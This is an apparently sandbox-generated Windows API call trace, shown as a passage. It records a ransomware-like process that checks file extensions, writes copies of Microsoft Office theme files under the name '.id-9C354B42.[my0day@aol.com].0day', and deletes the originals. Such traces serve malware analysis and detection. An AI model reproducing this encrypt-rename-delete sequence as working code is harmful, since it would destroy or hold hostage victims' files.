[0272.054] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0272.054] lstrlenW (lpString=".xls") returned 4 [0272.054] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0272.054] lstrlenW (lpString=".xlsx") returned 5 [0272.054] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0272.054] lstrlenW (lpString=".ppt") returned 4 [0272.054] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0272.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0272.054] lstrlenW (lpString=".zip") returned 4 [0272.054] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0272.054] lstrlenW (lpString=".rar") returned 4 [0272.054] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0272.054] lstrlenW (lpString=".bz2") returned 4 [0272.054] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0272.054] lstrlenW (lpString=".7z") returned 3 [0272.054] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0272.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0272.054] lstrlenW (lpString=".dbf") returned 4 [0272.054] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0272.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0272.054] lstrlenW (lpString=".1cd") returned 4 [0272.054] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0272.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63 [0272.054] lstrlenW (lpString=".jpg") returned 4 [0272.055] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0272.055] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.055] lstrlenW (lpString="Apex.eftx") returned 9 [0272.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.073] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=218310) returned 1 [0272.073] CloseHandle (hObject=0x3a4) returned 1 [0272.073] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx")) returned 0x20 [0272.076] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0272.077] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.077] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0272.131] GetLastError () returned 0x0 [0272.131] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x354c6, lpOverlapped=0x0) returned 1 [0272.142] WriteFile (in: hFile=0x380, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x354d0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x354d0, lpOverlapped=0x0) returned 1 [0272.147] ReadFile (in: hFile=0x37c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.147] WriteFile (in: hFile=0x380, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0272.148] SetEndOfFile (hFile=0x380) returned 1 [0272.156] CloseHandle (hObject=0x380) returned 1 [0272.156] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.156] SetEndOfFile (hFile=0x37c) returned 1 [0272.510] CloseHandle (hObject=0x37c) returned 1 [0272.510] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.585] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx")) returned 1 [0272.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0272.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0272.586] lstrlenW (lpString=".doc") returned 4 [0272.586] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.586] lstrlenW (lpString=".docx") returned 5 [0272.586] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.586] lstrlenW (lpString=".pdf") returned 4 [0272.586] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.586] lstrlenW (lpString=".xls") returned 4 [0272.586] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.586] lstrlenW (lpString=".xlsx") returned 5 [0272.586] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.586] lstrlenW (lpString=".ppt") returned 4 [0272.586] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0272.586] lstrlenW (lpString=".zip") returned 4 [0272.586] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.586] lstrlenW (lpString=".rar") returned 4 [0272.586] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.586] lstrlenW (lpString=".bz2") returned 4 [0272.586] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.586] lstrlenW (lpString=".7z") returned 3 [0272.586] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0272.586] lstrlenW (lpString=".dbf") returned 4 [0272.586] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0272.586] lstrlenW (lpString=".1cd") returned 4 [0272.586] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0272.586] lstrlenW (lpString=".jpg") returned 4 [0272.587] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0272.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0272.587] lstrlenW (lpString=".doc") returned 4 [0272.587] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.587] lstrlenW (lpString=".docx") returned 5 [0272.587] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.587] lstrlenW (lpString=".pdf") returned 4 [0272.587] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.587] lstrlenW (lpString=".xls") returned 4 [0272.587] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.587] lstrlenW (lpString=".xlsx") returned 5 [0272.587] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.587] lstrlenW (lpString=".ppt") returned 4 [0272.587] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0272.587] lstrlenW (lpString=".zip") returned 4 [0272.587] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.587] lstrlenW (lpString=".rar") returned 4 [0272.587] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.587] lstrlenW (lpString=".bz2") returned 4 [0272.587] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.587] lstrlenW (lpString=".7z") returned 3 [0272.587] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0272.587] lstrlenW (lpString=".dbf") returned 4 [0272.587] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0272.587] lstrlenW (lpString=".1cd") returned 4 [0272.587] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx") returned 76 [0272.587] lstrlenW (lpString=".jpg") returned 4 [0272.588] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.588] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.588] lstrlenW (lpString="Concourse.eftx") returned 14 [0272.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0272.596] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=22417) returned 1 [0272.596] CloseHandle (hObject=0x380) returned 1 [0272.596] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx")) returned 0x20 [0272.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.636] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.636] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0272.636] GetLastError () returned 0x0 [0272.636] ReadFile (in: hFile=0x318, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x5791, lpOverlapped=0x0) returned 1 [0272.714] WriteFile (in: hFile=0x380, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x57a0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x57a0, lpOverlapped=0x0) returned 1 [0272.715] ReadFile (in: hFile=0x318, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.715] WriteFile (in: hFile=0x380, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0272.715] SetEndOfFile (hFile=0x380) returned 1 [0272.715] CloseHandle (hObject=0x380) returned 1 [0272.715] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.715] SetEndOfFile (hFile=0x318) returned 1 [0272.718] CloseHandle (hObject=0x318) returned 1 [0272.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.718] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx")) returned 1 [0272.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0272.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0272.718] lstrlenW (lpString=".doc") returned 4 [0272.718] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.718] lstrlenW (lpString=".docx") returned 5 [0272.718] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.719] lstrlenW (lpString=".pdf") returned 4 [0272.719] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.719] lstrlenW (lpString=".xls") returned 4 [0272.719] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.719] lstrlenW (lpString=".xlsx") returned 5 [0272.719] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.719] lstrlenW (lpString=".ppt") returned 4 [0272.719] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0272.719] lstrlenW (lpString=".zip") returned 4 [0272.719] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.719] lstrlenW (lpString=".rar") returned 4 [0272.719] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.719] lstrlenW (lpString=".bz2") returned 4 [0272.719] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.719] lstrlenW (lpString=".7z") returned 3 [0272.719] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0272.719] lstrlenW (lpString=".dbf") returned 4 [0272.719] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0272.719] lstrlenW (lpString=".1cd") returned 4 [0272.719] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0272.719] lstrlenW (lpString=".jpg") returned 4 [0272.719] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0272.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0272.719] lstrlenW (lpString=".doc") returned 4 [0272.719] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.719] lstrlenW (lpString=".docx") returned 5 [0272.719] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.720] lstrlenW (lpString=".pdf") returned 4 [0272.720] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.720] lstrlenW (lpString=".xls") returned 4 [0272.720] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.720] lstrlenW (lpString=".xlsx") returned 5 [0272.720] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.720] lstrlenW (lpString=".ppt") returned 4 [0272.720] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0272.720] lstrlenW (lpString=".zip") returned 4 [0272.720] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.720] lstrlenW (lpString=".rar") returned 4 [0272.720] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.720] lstrlenW (lpString=".bz2") returned 4 [0272.720] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.720] lstrlenW (lpString=".7z") returned 3 [0272.720] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0272.720] lstrlenW (lpString=".dbf") returned 4 [0272.720] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0272.720] lstrlenW (lpString=".1cd") returned 4 [0272.720] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0272.720] lstrlenW (lpString=".jpg") returned 4 [0272.720] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.721] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.721] lstrlenW (lpString="Equity.eftx") returned 11 [0272.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.745] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=24611) returned 1 [0272.745] CloseHandle (hObject=0x318) returned 1 [0272.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx")) returned 0x20 [0272.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.745] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.745] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0272.746] GetLastError () returned 0x0 [0272.746] ReadFile (in: hFile=0x318, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x6023, lpOverlapped=0x0) returned 1 [0272.748] WriteFile (in: hFile=0x380, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x6030, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x6030, lpOverlapped=0x0) returned 1 [0272.750] ReadFile (in: hFile=0x318, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.750] WriteFile (in: hFile=0x380, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xea, lpOverlapped=0x0) returned 1 [0272.750] SetEndOfFile (hFile=0x380) returned 1 [0272.750] CloseHandle (hObject=0x380) returned 1 [0272.750] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.750] SetEndOfFile (hFile=0x318) returned 1 [0272.760] CloseHandle (hObject=0x318) returned 1 [0272.760] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.760] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx")) returned 1 [0272.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0272.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0272.761] lstrlenW (lpString=".doc") returned 4 [0272.761] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.761] lstrlenW (lpString=".docx") returned 5 [0272.761] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.761] lstrlenW (lpString=".pdf") returned 4 [0272.761] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.761] lstrlenW (lpString=".xls") returned 4 [0272.761] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.761] lstrlenW (lpString=".xlsx") returned 5 [0272.761] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.761] lstrlenW (lpString=".ppt") returned 4 [0272.761] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0272.761] lstrlenW (lpString=".zip") returned 4 [0272.761] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.761] lstrlenW (lpString=".rar") returned 4 [0272.761] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.761] lstrlenW (lpString=".bz2") returned 4 [0272.761] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.761] lstrlenW (lpString=".7z") returned 3 [0272.761] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0272.761] lstrlenW (lpString=".dbf") returned 4 [0272.761] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0272.761] lstrlenW (lpString=".1cd") returned 4 [0272.761] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0272.761] lstrlenW (lpString=".jpg") returned 4 [0272.762] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0272.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0272.762] lstrlenW (lpString=".doc") returned 4 [0272.762] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.762] lstrlenW (lpString=".docx") returned 5 [0272.762] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.762] lstrlenW (lpString=".pdf") returned 4 [0272.762] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.762] lstrlenW (lpString=".xls") returned 4 [0272.762] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.762] lstrlenW (lpString=".xlsx") returned 5 [0272.762] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.762] lstrlenW (lpString=".ppt") returned 4 [0272.762] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned 78 [0272.762] lstrlenW (lpString=".zip") returned 4 [0272.762] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.762] lstrlenW (lpString=".rar") returned 4 [0272.762] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.762] lstrlenW (lpString=".bz2") returned 4 [0272.762] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.762] lstrlenW (lpString=".7z") returned 3 [0272.762] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme 